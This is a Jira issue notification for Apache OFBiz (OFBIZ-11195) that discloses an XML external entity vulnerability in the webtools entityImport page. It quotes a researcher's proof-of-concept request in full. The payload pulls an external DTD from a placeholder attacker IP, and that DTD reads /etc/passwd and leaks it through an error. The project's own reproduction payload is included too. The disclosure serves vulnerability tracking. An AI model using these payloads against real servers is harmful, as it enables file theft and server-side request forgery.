[jira] [Created] (OFBIZ-11195) XML Entity Injection in webtools/control/entityImport

[Jacques Le Roux (Jira)]

Jacques Le Roux created OFBIZ-11195:
---------------------------------------

             Summary:  XML Entity Injection in webtools/control/entityImport
                 Key: OFBIZ-11195
                 URL: https://issues.apache.org/jira/browse/OFBIZ-11195
             Project: OFBiz
          Issue Type: Bug
          Components: framework/webtools
    Affects Versions: Trunk
            Reporter: Jacques Le Roux


This was reported to the OFBiz security team by Jason Nordenstam from 
offensive-security.com. We did not consider it as a real security issue because 
it requires authentication.

{quote}
Authenticated users can import XML documents containing DTDs. The SAX parser 
used by the XML Data Import functionality does not have DTD parsing explicitly 
disabled which makes it vulnerable to XXE attacks.

The results of the import are not displayed in the page which means an 
'error-based' approach is needed to read local files. The parser will also 
resolve external entities so this vulnerability can also be used for internal 
port scanning or server-side request forgery.
 Affected URL:
 /webtools/control/entityImport

POC Example Request:
 POST /webtools/control/entityImport HTTP/1.1
 Host:<host>
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 
Firefox/60.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: <host>/webtools/control/entityImport
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 312
 Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
 Connection: close
 Upgrade-Insecure-Requests: 1

fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A

Payload One Decoded:
 <?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE notfound [
 <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
 %base;
 %param1;
 %external;
 ]>
 <root><foo>bar</bar></root>

error.dtd on Attacking Machine:
 <!ENTITY % payload SYSTEM "file:///etc/passwd">
 <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
{quote}

We have reproduced it at 
[https://demo-stable.ofbiz.apache.org/webtools/control/entityImport]
 using :
{code:xml}
<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE notfound [
 <!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd";>
 %base;
 %param1;
 %external;
 ]>
 <root><foo>bar</bar></root>
{code}



--
This message was sent by Atlassian Jira
(v8.3.2#803003)